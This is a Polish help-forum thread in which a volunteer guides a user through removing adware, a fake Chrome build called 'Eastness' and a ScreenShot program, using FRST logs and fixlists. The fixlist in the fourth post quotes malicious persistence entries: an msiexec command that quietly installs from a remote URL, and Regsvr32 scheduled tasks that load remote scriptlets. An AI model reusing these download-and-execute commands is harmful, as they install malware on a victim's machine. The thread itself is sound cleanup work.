Infekcja laptopa + wolna praca


(m242989) #1

Witam

Mam infekcję laptopa mimo przeskanowania komputera antywirusem AVG i ADW Cleaner wyskakują mi często jakieś reklamy oraz nie mogę zmienić strony startowej… mimo iż ustawioną mam Google. Do tego mam wrażenie że laptop wolniej działa.

Poniżej wszystkie logi

Logi FRST --> http://wklej.org/id/3093072/

Addition --> http://wklej.org/id/3093073/

SHortcut --> http://wklej.org/id/3093075/


(Atis) #2

Nie widać żebyś użył AdwCleaner. Po co instaluszesz szkodliwe programy typu YAC?
W panelu sterowania odinstaluj YAC(Yet Another Cleaner!)
Pobierz i uruchom AdwCleaner Kliknij Skanuj (Scan) i później Oczyść (Clean).
Kliknij Skanuj (Scan) i pokaż nowy raport FRST i Addition.


(m242989) #3

Używałem adwcleaner wcześniej dziwne że nie widać. Odinstalowałem teraz to YAC

zrobiłem nim scan ponownie tutaj raport z usuniętych rzeczy programem adwcleaner http://wklej.org/id/3093109/

Logi
FRST --> http://wklej.org/id/3093119/
ADDITION --> http://wklej.org/id/3093120/
SHORTCUT --> http://wklej.org/id/3093123/


(Atis) #4

Czy celowo zainstalowałeś ten program: C:\Program Files (x86)\ScreenShot
Wklej do systemowego notatnika i zapisz jako plik tekstowy o nazwie fixlist:

HKU\S-1-5-21-3161061866-2497274638-1024313084-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1SFjH4NTw8NTI8MkY2Fdq2Ndw8MUNSNkI2NTI8MTZYNq== /q IFEO\DisplaySwitch.exe: [Debugger] IFEO\taskmgr.exe: [Debugger] ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2016-12-12] (Oracle Corporation) HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKU\S-1-5-21-3161061866-2497274638-1024313084-1000\Software\Microsoft\Internet Explorer\Main,Start Page = SearchScopes: HKU\S-1-5-21-3161061866-2497274638-1024313084-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = CHR DefaultSearchURL: Default -> hxxp://www.ourluckysites.com/search/?type=ds&ts=1492616707&z=27e2be57edc442b282bce0eg2zdtco9qegcqfmae5q&from=che0812&uid=ST9640423AS_5WS0JER4XXXX5WS0JER4&q={searchTerms} CHR DefaultSearchKeyword: Default -> ourluckysites S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X] 2017-04-21 20:41 - 2017-04-22 14:52 - 00000000 ____D C:\AdwCleaner 2017-04-21 18:47 - 2017-04-21 20:41 - 00000000 _____ C:\Windows\SysWOW64\22 2017-04-21 18:47 - 2017-04-21 20:41 - 00000000 _____ C:\Windows\SysWOW64\11 2017-04-21 18:42 - 2017-04-21 18:47 - 00000000 ____D C:\Program Files (x86)\BiaoJi 2017-04-19 19:44 - 2017-04-21 20:44 - 00000000 ____D C:\Windows\system32\log 2017-04-19 17:51 - 2017-04-19 17:51 - 00000000 ____D C:\Users\Marta\AppData\LocalLow\Temp 2017-04-19 17:45 - 2017-04-19 17:45 - 00000000 ____D C:\Program Files (x86)\temp 2017-04-19 17:44 - 2017-04-21 08:01 - 00000000 ____D C:\Users\Marta\AppData\Local\3DM 2017-04-17 18:55 - 2017-04-17 18:55 - 00000000 ____D C:\Users\Marta\AppData\Local\Eastness 2017-04-17 18:55 - 2017-04-17 18:55 - 00000000 ____D C:\ProgramData\Software 2017-04-17 18:55 - 2017-04-17 18:55 - 00000000 ____D C:\Program Files (x86)\MIO 2017-04-17 18:55 - 2017-04-17 18:55 - 00000000 ____D C:\Program Files (x86)\Eastness 2017-04-13 17:07 - 2017-04-13 17:07 - 00000000 ____D C:\Users\Marta\AppData\Roaming\SSMgre Task: {48132C22-989B-4C96-9E26-57DF4C14A32F} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1SFjH4NTw8NTI8MkY2Fdq2Ndw8MUNSNkI2NTI8MTZYNq== scrobj.dll Task: {A4D7F1A7-125C-4D81-A45C-60FAA58D0782} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1SFjH4NTw8NTI8MkY2Fdq2Ndw8MUNSNkI2NTI8MTZYNq== scrobj.dll Shortcut: C:\Users\Marta\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) Shortcut: C:\Users\Marta\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) Shortcut: C:\Users\Marta\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) EmptyTemp:
Uruchom FRST i kliknij Napraw (Fix). Pokaż raport z usuwania Fixlog.
Kliknij Skanuj (Scan) i pokaż nowy raport z FRST bez Addition i Shortcut.


(m242989) #5

Celowo nic nie instalowałem… mogło się jedynie zainstalować przypadkiem gdy coś sciągałem…

Odisntalował mi się Chrome po tych naprawach coś :slight_smile:

raport z fixlog http://www.wklej.org/id/3093186/

raport z FRST --> http://www.wklej.org/id/3093196/


(Atis) #6

Otwórz folder: C:\Program Files (x86)\ScreenShot
Kliknij prawym na pliku Uninstall i wybierz Uruchom jako administrator.
Napisz czy udało się odinstalować ten program.

To nie było Chrome tylko szkodliwa podróbka o nazwie Eastness:


(m242989) #7

Niestety nie da udało się go odinstalować jak uruchamiam jako administrator to wyskakuje takie dziwne okienko zdjęcie w załączniku

Próbowałem usunąć to także programem Revo Unistaller oraz próbowałem zniszczyć ten plik za pomocą antywirusa AVG ale bez skutku…


(Atis) #8

Wklej do systemowego notatnika i zapisz jako plik tekstowy o nazwie fixlist:

CloseProcesses: R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScreenShot C:\Program Files (x86)\ScreenShot C:\Users\Marta\AppData\Roaming\ScreenShot EmptyTemp:
Uruchom FRST i kliknij Napraw (Fix). Pokaż raport z usuwania Fixlog.
Kliknij Skanuj (Scan) i pokaż nowy raport z FRST bez Addition i Shortcut.


(m242989) #9

Raport z fixlog --> http://wklej.org/id/3093886/

Raport z FIRST–> http://wklej.org/id/3093887/


(Atis) #10

Wklej do systemowego notatnika i zapisz jako plik tekstowy o nazwie fixlist:

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScreenShot C:\Program Files\AVAST Software C:\ProgramData\AVAST Software DeleteQuarantine:
Uruchom FRST i kliknij Napraw (Fix). Później skasuj folder C:\FRST
Czyszczenie folderów Przywracania systemu
Przeczytaj w jaki sposób należy instalować programy: KLIK - KLIK - KLIK
Odinstaluj Java 8 Update 121 i zainstaluj Java 8 Update 131


(m242989) #11

Zrobione

Komputer śmiga tak jak powinien :slight_smile:

Dziękuje Ci Bardzo Atis za poświęcony czas i za twą pomoc!!! Bardzo Bardzo mi pomogłeś jeszcze raz dziękuję :)))))))) Najlepsze forum na świecie!

Miłej niedzieli :slight_smile: